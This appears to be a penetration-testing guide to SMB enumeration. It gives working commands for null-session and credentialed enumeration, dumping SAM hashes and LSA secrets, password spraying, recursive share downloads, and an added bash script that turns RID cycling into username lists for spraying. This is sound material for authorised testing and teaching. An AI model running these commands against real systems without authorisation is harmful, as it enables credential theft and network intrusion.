The Pentesting Guide

139,445 - SMB

Introduction

Port: 139,445 (TCP)

Server Message Block (SMB) is the file, printer and named-pipe sharing protocol used by Windows hosts (and by Samba on Unix-like systems). It listens on TCP 445 (SMB directly over TCP) and on TCP 139 (SMB over the legacy NetBIOS session service). Because SMB also carries MSRPC over named pipes, it exposes far more than files: users, groups, password policy and sessions can all be enumerated through it, which makes it one of the most valuable services to find open.

SMB General Enumeration

A quick way to discover NetBIOS services on a network is with nbtscan.

nbtscan -r <NETWORK>/<MASK>

With Nmap's smb-enum-* scripts you can obtain domains, groups, processes, services, sessions, shares and users. Most of them need an account: a null session rarely gets past share enumeration on current Windows, so pass credentials with --script-args smbusername=<USER>,smbpassword=<PASS>[,smbdomain=<DOMAIN>] when you have them. The smb2-* scripts (dialects, security mode, time) work unauthenticated and tell you whether message signing is required, which decides whether SMB relay is an option later.

sudo nmap --script "smb-enum-*" -p139,445 <TARGET>
sudo nmap --script "smb2*" -p139,445 <TARGET>

Then check for known vulnerabilities. Review the script list before running the wildcard against production hosts: some of these checks are intrusive (smb-vuln-ms10-054 blue-screens a vulnerable machine).

sudo nmap --script "smb-vuln-*" -p139,445 <TARGET>

With valid credentials crackmapexec pulls much more through the same port:

  • --sam and --lsa: dump the local SAM hashes and LSA secrets (local administrator required)
  • --sessions and --loggedon-users: who is connected to, or logged on at, the host (admin on current Windows)
  • --disks and --local-groups: local drives and local groups
  • --pass-pol: domain password and lockout policy (any authenticated session; read it before spraying)
  • --rid-brute: user enumeration by RID cycling (see the RID cycling section below)
  • --shares: shares and the READ/WRITE access of the supplied account

crackmapexec smb <IP|RANGE> -d <DOMAIN> -u '<USERNAME>' -p '<PASSWORD>' --<OPTION>

Finally, enum4linux wraps most of the above (shares, users, groups, password policy, RID cycling) in one run; -a does all of it, and the enum4linux-ng rewrite uses -A for the same set:

enum4linux -a [-u "<USERNAME>" -p "<PASSWORD>"] <IP>
enum4linux-ng -A [-u "<USERNAME>" -p "<PASSWORD>"] <IP>
# null session, then guest, against a domain controller
enum4linux -a -u "" -p "" <DC_IP> && enum4linux -a -u "guest" -p "" <DC_IP>

User enumeration

Once the Nmap scan shows SMB, check whether the server accepts a null session (empty username and password), the guest account or an anonymous login. Each of these can expose the share list and, on older or loosely configured hosts, users, groups and the password policy as well.

Note: -N tells smbclient not to prompt for a password.

smbclient -N -L //<IP>/                            # null session
smbclient -N -L //<IP>/ -U "[guest|anonymous]%"    # guest or anonymous account, empty password

With crackmapexec the same check is one command per account; a [+] line means the credentials were accepted. The same syntax takes a user list and a password list for spraying, but read the lockout policy first (--pass-pol): a domain lockout threshold is easy to trip with a wordlist.

crackmapexec smb <IP|RANGE> -u '' -p ''                                         # null session
crackmapexec smb <IP|RANGE> -u 'guest' -p ''                                    # guest
crackmapexec smb <IP|RANGE> -d <DOMAIN> -u <USERNAMES.TXT> -p <PASSWORDS.TXT>   # spraying

rpcclient enumeration (MSRPC over SMB)

rpcclient speaks MSRPC over SMB named pipes (\pipe\samr, \pipe\lsarpc, \pipe\srvsvc), so it goes through 139/445 rather than the endpoint mapper on 135. With a null session or credentials you can query the domain, its password policy, users, groups, printers and shares.

rpcclient -U '[<DOMAIN>\]<USERNAME>[%<PASSWORD>]' [-N] <TARGET>   # -U '' -N for a null session
> srvinfo              # OS version and server type
> lsaquery             # domain name and domain SID (needed for RID cycling)
> querydominfo         # domain name, user and group counts
> getdompwinfo         # password policy: minimum length, complexity flags
> enumdomusers         # users with their RIDs
> enumdomgroups        # groups with their RIDs
> queryuser <RID>      # one user in detail, e.g. queryuser 0x1f4 (Administrator)
> querydispinfo        # users with full names and descriptions
> enumprinters
> netshareenum         # shares visible to this account
> netshareenumall      # all shares, including the hidden admin shares

RID CYCLING ATTACK

Every domain principal has a SID made of the domain SID plus a relative identifier (RID). Built-in accounts use fixed RIDs (500 Administrator, 501 Guest, 512 Domain Admins) and user-created accounts are numbered sequentially from 1000, so asking the LSA to translate <DOMAIN_SID>-500, -501, ... back into names yields the account list even when SAMR enumeration (enumdomusers) is denied to the account you hold. crackmapexec's --rid-brute and Impacket's lookupsid.py automate this; crackmapexec's --users instead asks SAMR directly.

crackmapexec smb <IP> -d <DOMAIN> -u '<USERNAME>' -p '<PASSWORD>' --rid-brute   # LSA lookups, RIDs up to 4000 by default
crackmapexec smb <IP> -d <DOMAIN> -u '<USERNAME>' -p '<PASSWORD>' --users       # SAMR user enumeration
lookupsid.py '<DOMAIN>/<USERNAME>:<PASSWORD>@<TARGET>' [<MAX_RID>]
lookupsid.py 'anonymous@<TARGET>' -no-pass                                      # null session
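As an added example (not the guide's code), the script below does the RID cycling by hand with rpcclient's lookupsids command, which resolves a whole batch of SIDs per request, and turns the answers into a bare username list for spraying. It assumes Samba's rpcclient on the path and a reachable target; the domain SID is read from lsaquery, the RID range and batch size are assumed defaults, and the target address, account names and rpcclient output in the comments are constructed.

```shell
#!/usr/bin/env bash
# Added example (not part of the guide): RID cycling with rpcclient.
#
# Every domain principal has the SID <DOMAIN_SID>-<RID>. Built-in accounts
# use fixed RIDs (500 Administrator, 501 Guest, 512 Domain Admins) and
# user-created ones are numbered from 1000, so asking LSA to translate
# <DOMAIN_SID>-500 ... <DOMAIN_SID>-1100 back into names lists the accounts
# even when enumdomusers is denied. lookupsids accepts many SIDs per call,
# so they are sent in batches instead of one rpcclient process per RID.
set -uo pipefail

# Domain SID from `rpcclient -c lsaquery` output ("Domain Sid: S-1-5-21-...").
parse_domain_sid() { awk '/^Domain Sid:/ { print $3; exit }'; }

# One line of space-separated SIDs for RIDs FIRST..LAST.
sid_batch() {                            # sid_batch <DOMAIN_SID> <FIRST> <LAST>
  local dsid=$1 rid out=""
  for ((rid = $2; rid <= $3; rid++)); do out+="$dsid-$rid "; done
  printf '%s\n' "${out% }"
}

# Parse `lookupsids` output. Each line looks like (constructed sample)
#   S-1-5-21-...-500 CORP\Administrator (1)
# and the trailing number is the SID_NAME_USE type:
#   1 user, 2 group, 4 alias (local group), 8 unknown (RID not in use).
# Emits "<RID>\t<kind>\t<DOMAIN\name>" for every SID that resolved.
parse_lookupsids() {
  awk '
    /^S-1-5-21-/ {
      type = $NF; gsub(/[()]/, "", type)
      if (type == 8) next                       # unused RID, skip
      rid = $1; sub(/.*-/, "", rid)
      name = $0
      sub(/^[^ ]+ /, "", name)                  # strip the SID
      sub(/ \([0-9]+\)$/, "", name)             # strip the type
      kind = (type == 1) ? "user" : (type == 2) ? "group" : (type == 4) ? "alias" : "other"
      printf "%s\t%s\t%s\n", rid, kind, name
    }'
}

# Reduce the parsed table to bare usernames (domain prefix removed), ready for
# a password spray with crackmapexec.
users_only() { awk -F'\t' '$2 == "user" { sub(/.*\\/, "", $3); print $3 }'; }

# Network driver (not exercised offline). CREDS is '' for a null session or
# 'DOMAIN\user%password'. Assumed defaults: RIDs 500-1100 in batches of 50.
rid_cycle() {                            # rid_cycle <TARGET> <CREDS> [FIRST] [LAST] [BATCH]
  local target=$1 creds=$2 first=${3:-500} last=${4:-1100} batch=${5:-50}
  local dsid lo hi
  dsid=$(rpcclient -U "$creds" -N "$target" -c lsaquery 2>/dev/null | parse_domain_sid)
  if [ -z "$dsid" ]; then echo "lsaquery failed: no access or wrong credentials" >&2; return 1; fi
  for ((lo = first; lo <= last; lo += batch)); do
    hi=$((lo + batch - 1)); if ((hi > last)); then hi=$last; fi
    rpcclient -U "$creds" -N "$target" -c "lookupsids $(sid_batch "$dsid" "$lo" "$hi")" 2>/dev/null
  done | parse_lookupsids
}

# Usage (hypothetical target and account):
#   rid_cycle 10.10.10.10 ''                                              # null session
#   rid_cycle 10.10.10.10 'CORP\j.smith%Winter2024' 500 2000 | users_only > users.txt
```

The batch size matters in practice: one rpcclient process per RID is slow and noisy in the target's event log, while too many SIDs in a single lookupsids call can exceed what the server accepts, so 50 is a safe middle ground. Type 8 answers are the unused RIDs and are dropped; the group and alias rows are kept because they reveal privileged group names worth targeting later.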

Shares enumeration

Once you have a session (null, guest or authenticated), check what it grants on each share. READ on shares such as SYSVOL, NETLOGON, backups or IT tooling often yields scripts with credentials; WRITE is worth recording for later phases.

smbmap [-u "<USERNAME>" -p "[<PASSWORD>|<NTLM_HASH>]"] -H <IP>
crackmapexec smb <IP|RANGE> -u '[<USERNAME>]' [-p '[<PASSWORD>]' | -H <NTLM_HASH> ] --shares
./checkSMBPermissions.sh <DOMAIN\\USER> <PASSWORD> <IP>

Where you have READ, list the files of each share (smbclient -L only lists the shares of a host, so connect to the share and run ls):

smbclient //<IP>/<SHARE> -U "[<USERNAME>]%[<PASSWORD>]" -c 'ls'
# Recursive list
smbmap [-u "<USERNAME>" -p "<PASSWORD>"] -R [<SHARE>] -H <IP> [-P <PORT>]
# Non-recursive list
smbmap [-u "<USERNAME>" -p "<PASSWORD>"] -r [<SHARE>] -H <IP> [-P <PORT>]

Finally, open the share to upload or download files, one at a time or recursively.

smbclient //<IP>/<SHARE> -U "[<USERNAME>]%[<PASSWORD>]"
# Manually
smb: \> get <FILE>
smb: \> put <LOCAL_FILE>
# Recursive download
smb: \> prompt        # toggles per-file confirmation off
smb: \> recurse       # toggles directory recursion on
smb: \> mget *

Alternatively, mount the share and browse it with normal tools (mounting needs root):

sudo apt-get install cifs-utils
mkdir -p <LOCAL_FOLDER>
# null session; for an authenticated mount use -o 'username=<USERNAME>,password=<PASSWORD>[,domain=<DOMAIN>]'
sudo mount -t cifs //<IP>/<SHARE> <LOCAL_FOLDER> -o 'user=,password='
# add vers=1.0 to the options if the host only speaks SMB1

NetBIOS Enumeration - Port 139

The NetBIOS name service (UDP 137) gives you the host's NetBIOS names, workgroup or domain and MAC address without any authentication:

nmblookup -A <IP>     # name table of one host
nbtscan <IP>          # same, also works on a range: nbtscan -r <NETWORK>/<MASK>

LANMAN1 Error

Modern Samba clients refuse SMB1 by default (client min protocol = SMB2_02), so smbclient and rpcclient fail during protocol negotiation against hosts that only speak SMB1 (Windows XP/2003-era systems, old NAS boxes, embedded devices), typically with protocol negotiation failed: NT_STATUS_CONNECTION_DISCONNECTED. Lowering the client's minimum protocol fixes this: NT1 (the SMB1 dialect proper) is usually enough, LANMAN1 reaches back to even older servers. Setting it in the [global] section of /etc/samba/smb.conf changes every Samba client on your machine:

[global]
# Change this to the workgroup/NT-domain name your Samba server will part of
    workgroup = WORKGROUP
    client min protocol = LANMAN1
#### Networking ####

A cleaner alternative is to pass the setting per command, which leaves your configuration untouched:

smbclient --option='client min protocol=LANMAN1' -N -L //<IP>/
